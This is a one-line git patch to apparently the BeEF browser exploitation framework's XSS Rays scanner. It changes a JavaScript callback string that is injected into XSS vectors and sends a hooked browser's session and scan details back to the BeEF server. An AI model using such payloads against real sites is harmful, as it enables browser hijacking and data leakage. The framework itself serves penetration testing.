From 73e291832ecd413f9a53837e8b31952db3860e5e Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 7 Apr 2013 15:54:14 +0100
Subject: [PATCH] Replacing document.location.href with location in xssrays.js.

---
 core/main/client/net/xssrays.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js
index 183c8cfa5..1eccb54d5 100644
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -340,7 +340,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
                             + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);